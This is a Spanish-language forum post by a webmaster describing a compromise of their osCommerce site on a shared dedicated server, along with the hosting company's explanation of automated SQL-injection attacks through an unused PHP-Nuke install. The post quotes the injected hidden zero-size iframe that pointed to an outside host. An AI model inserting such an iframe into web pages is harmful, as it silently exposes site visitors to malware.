A mí me ha pasado lo mismo.

Me han modificado el index añadiendo <iframe src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad</iframe>

Pero no sólo eso, en mi caso han sido mucho más destructivos: todas las líneas del index.php han sido truncadas, es decir, han eliminado los dos últimos caracteres de cada línea: <?php ---> <?p y mi web desmontada.

La web es un oscommerce (hasta ahora no conozco agujeros negros en oscommerce), y está en un servidor dedicado junto dos otros sitios:

- uno tiene un php nuke que no se está utilizando (es decir, se ha sustituido el index y abre una web que no tiene nada que ver con el php nuke). El index.php del nuke que no se utiliza también ha sido modificado y se le ha añadido un <iframe>

- Otro tiene un foro phpbb deshabilitado.

La empresa que gestiona el servidor nos ha hablado de la vulnerabilidad del php nuke y nos ha recomendado borrarlo ya que no lo usamos, pero yo no me explico cómo desde el nuke de un hosting pueden acceder al index.php de otro.

Un saludo

EDITO: Respuestas de la empresa que gestiona el servidor

P - ¿Cómo se puede utilizar un php nuke deshabilitado para atacar otro hosting?
R - son ataques automáticos que utilizan inserciones SQL en la base de datos y otras medidas

P - ¿Cómo se puede saber que el sitio con php nuke y el que no lo tiene pero ha sido modificado están en el mismo servidor?
R - no buscan hosting en la misma maquina, sino hosting con php-nuke y otros sistemas vulnerables.


Me han dicho que ya les ha pasado en otros servidores, que acceden con inyecciones SQL a la máquina y cambián todos los indexs que hay en el servidor.
Si fuera posible alguna explicación más detallada os lo agradecería